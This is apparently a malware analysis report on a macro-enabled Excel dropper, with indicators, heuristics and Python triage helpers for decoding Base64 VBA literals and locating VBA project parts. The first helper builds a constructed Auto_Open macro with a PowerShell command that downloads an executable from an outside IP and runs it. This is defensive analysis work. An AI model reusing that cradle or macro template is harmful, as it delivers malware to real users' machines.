Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 b18c87aea2b0dd0b…

MALICIOUS

Office (OOXML) / .XLSM

Size: 102.9 KB
Created: 2021-08-19 14:03:52 UTC
Authoring application: Microsoft Excel 15.0300
MD5: 2f12dccc7f18f950f2ea3b13bd2764b6
SHA-1: 2efd6d93d5843be124b03e0054c2e6f032707d9d
SHA-256: b18c87aea2b0dd0b2bbec69f27aa7eb51203da8989d70e9f12890e289f7ed29f
Risk score: 80

Malware Insights

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell

The critical heuristic OLE_VBA_SHELL fires on a Shell() call inside the VBA project. The extracted VBA source holds obfuscated Base64-encoded string literals which, once decoded, are PowerShell commands. The first downloads an executable from 'http://18.192.215.191/tean/FDL_787410002031.exe', writes it to 'C:\APPDATA\z.exe' and runs it through PowerShell. The script also reassembles a second PowerShell command that appears to execute a file, most likely the downloaded payload. The document itself carries no executable payload; the second stage is fetched at run time, so the URL, the IP and the drop path are the indicators to block and hunt for.
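Decoding the Base64 strings described above is the step that turns the macro into indicators. The Python below is an added example, not the report's own tooling and not the actual macros.bas: it builds a constructed VBA fragment (an assumption for illustration, reusing the URL and drop path named in this report and split with '& _' line continuations the way real droppers split long literals), rejoins the split literals, decodes each Base64 candidate as UTF-8 or, for PowerShell -EncodedCommand payloads, UTF-16LE, and pulls URLs, drive paths and IPs out of the result. The Start-Process second stage is assumed for the example; the report only says the second command "appears to be for executing a file".

```python
"""Triage helper: pull Base64 literals out of VBA source and decode them to text."""
import base64
import re

# --- Constructed sample -------------------------------------------------------
# This VBA is constructed for the example; it is NOT the sample's macros.bas.
# CRADLE reuses the URL and drop path from the report; RUNNER is an assumed
# second stage (the report only says the second command appears to run a file).
CRADLE = ('powershell -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('
          "'http://18.192.215.191/tean/FDL_787410002031.exe','C:\\APPDATA\\z.exe')\"")
RUNNER = "Start-Process -FilePath 'C:\\APPDATA\\z.exe'"


def _b64(text: str, utf16: bool = False) -> str:
    """Base64 of the text; UTF-16LE is what PowerShell -EncodedCommand expects."""
    data = text.encode("utf-16-le") if utf16 else text.encode()
    return base64.b64encode(data).decode()


def _split_literal(encoded: str, width: int = 44) -> str:
    """Break one Base64 string into VBA literals joined with '& _' continuations."""
    chunks = [encoded[i:i + width] for i in range(0, len(encoded), width)]
    return " & _\n        ".join(f'"{c}"' for c in chunks)


SAMPLE_VBA = f'''
Sub Auto_Open()
    Dim s As String, e As String
    s = {_split_literal(_b64(CRADLE))}
    e = {_split_literal(_b64(RUNNER, utf16=True))}
    Range("A1").Value = "SheetNameExample"
    Shell s, vbHide
    Shell "powershell -EncodedCommand " & e, vbHide
End Sub
'''

# --- Decoder ------------------------------------------------------------------
_CONCAT = re.compile(r'"\s*&\s*(?:_\s*)?"')          # "abc" & _ <newline> "def"
_LITERAL = re.compile(r'"((?:[^"\n]|"")*)"')         # VBA literal, "" escapes a quote
_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")       # 16+ chars keeps short words out
_IOC_PATTERNS = {
    "urls": re.compile(r"""https?://[^\s'"<>)]+"""),
    "paths": re.compile(r"""[A-Za-z]:\\[^\s'"<>),]+"""),
    "ips": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}


def join_concatenated_literals(vba: str) -> str:
    """Collapse "abc" & _ "def" into "abcdef" so split Base64 can be read whole."""
    return _CONCAT.sub("", vba)


def string_literals(vba: str) -> list[str]:
    """Every string literal in the (rejoined) VBA source, in order of appearance."""
    joined = join_concatenated_literals(vba)
    return [m.group(1).replace('""', '"') for m in _LITERAL.finditer(joined)]


def decode_base64_text(candidate: str):
    """Return (text, encoding) if candidate is Base64 of printable text, else None."""
    if len(candidate) % 4 or not _B64.fullmatch(candidate):
        return None
    try:
        raw = base64.b64decode(candidate, validate=True)
    except ValueError:
        return None
    attempts = []
    # Every odd byte zero is the signature of UTF-16LE ASCII (-EncodedCommand).
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        attempts.append("utf-16-le")
    attempts.append("utf-8")
    for enc in attempts:
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text, enc
    return None   # valid Base64 alphabet but not text: a false positive, dropped


def analyze(vba: str) -> dict:
    """Decode every Base64 literal and extract URLs, drive paths and IPs from the results."""
    decoded = []
    for lit in string_literals(vba):
        hit = decode_base64_text(lit)
        if hit:
            decoded.append({"encoded": lit, "text": hit[0], "encoding": hit[1]})
    blob = "\n".join(d["text"] for d in decoded)
    iocs = {kind: sorted(set(pat.findall(blob))) for kind, pat in _IOC_PATTERNS.items()}
    return {"decoded": decoded, "iocs": iocs}


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    for d in result["decoded"]:
        print(f"[{d['encoding']}] {d['text']}")
    for kind, values in result["iocs"].items():
        print(f"{kind}: {values}")
```

Run against real output of olevba, the 16-character floor and the printable-text filter are what keep sheet names and GUIDs out of the results; Chr()-built strings and StrReverse() tricks are not handled here and need a further pass.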

Heuristics (2)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains vbaProject.bin, so VBA macros are present
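The OOXML_VBA heuristic is, at heart, a check for a VBA project part inside the ZIP container. The Python below is an added example, not part of this report or of the scanner that produced it: it builds a constructed, minimal OOXML-like container in memory (the vbaProject.bin stand-in is only an OLE header plus padding, not real VBA), then locates the VBA part both by its conventional name and by the content type declared in [Content_Types].xml, so a part renamed away from vbaProject.bin is still caught, and hashes what it carves. The part names and content-type strings are the real OOXML ones; the container contents are constructed.

```python
"""Locate and carve the VBA project part from an OOXML (xlsm/docm/pptm) container."""
import hashlib
import io
import re
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # CFB header every vbaProject.bin starts with
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Constructed stand-in for a real vbaProject.bin: only the OLE header is realistic.
FAKE_VBA_PROJECT = OLE_MAGIC + b"\x00" * 504 + b"constructed placeholder, not real VBA"


def build_ooxml(vba_part_name=None) -> bytes:
    """Build a minimal OOXML-like zip in memory (constructed test input, not the sample).

    vba_part_name=None gives a macro-free container; any other value adds a VBA part
    under that name and declares it in [Content_Types].xml, as Office does.
    """
    overrides = ['<Override PartName="/xl/workbook.xml" '
                 'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>']
    if vba_part_name:
        # Attribute order deliberately swapped: the detector must not depend on it.
        overrides.append(f'<Override ContentType="{VBA_CONTENT_TYPE}" PartName="/{vba_part_name}"/>')
    content_types = ('<?xml version="1.0" encoding="UTF-8"?>\n'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">\n'
                     + "\n".join(overrides) + "\n</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", "<workbook/>")
        if vba_part_name:
            z.writestr(vba_part_name, FAKE_VBA_PROJECT)
    return buf.getvalue()


def declared_vba_parts(content_types_xml: str) -> set:
    """Part names that [Content_Types].xml declares with the VBA project content type."""
    declared = set()
    for tag in re.findall(r"<Override\b[^>]*>", content_types_xml):
        part = re.search(r'PartName="/([^"]+)"', tag)
        ctype = re.search(r'ContentType="([^"]+)"', tag)
        if part and ctype and ctype.group(1) == VBA_CONTENT_TYPE:
            declared.add(part.group(1))
    return declared


def find_vba_parts(ooxml: bytes) -> list[dict]:
    """Every part that is a VBA project, matched by conventional name or declared type."""
    found = []
    with zipfile.ZipFile(io.BytesIO(ooxml)) as z:
        names = z.namelist()
        declared = set()
        if "[Content_Types].xml" in names:
            declared = declared_vba_parts(z.read("[Content_Types].xml").decode("utf-8", "replace"))
        for name in names:
            by_name = name.lower().endswith("vbaproject.bin")
            by_type = name in declared
            if not (by_name or by_type):
                continue
            data = z.read(name)
            found.append({
                "part": name,
                "size": len(data),
                "sha256": hashlib.sha256(data).hexdigest(),
                "ole_magic": data.startswith(OLE_MAGIC),   # False means it is not a real CFB file
                "matched_by": [k for k, v in (("name", by_name), ("content-type", by_type)) if v],
            })
    return found


if __name__ == "__main__":
    for label, part in (("conventional", "xl/vbaProject.bin"), ("renamed", "xl/embeddings/data.bin")):
        for hit in find_vba_parts(build_ooxml(part)):
            print(label, hit)
```

On a real file, read it with open(path, "rb").read() and hand the result to find_vba_parts(); the carved bytes are what olevba then decompresses into source such as the macros.bas listed below. A name-only check would miss the renamed case, which is why the content-type lookup is worth the extra lines.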

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename           Kind         Source                                                          Size
macros.bas         vba-macro    oletools.olevba.extract_macros (decoded VBA source from OOXML)  2460 bytes
  SHA-256: bc1e577e5959735087721465ce9d0cdbd0a9c885431a89b4696f91757eb26a0f
vbaProject_00.bin  vba-project  OOXML VBA project: xl/vbaProject.bin                            6144 bytes
  SHA-256: 8fda4b7095d240dfb059c4abeade133dbed4b475488477229db3ce3a8a2de4d6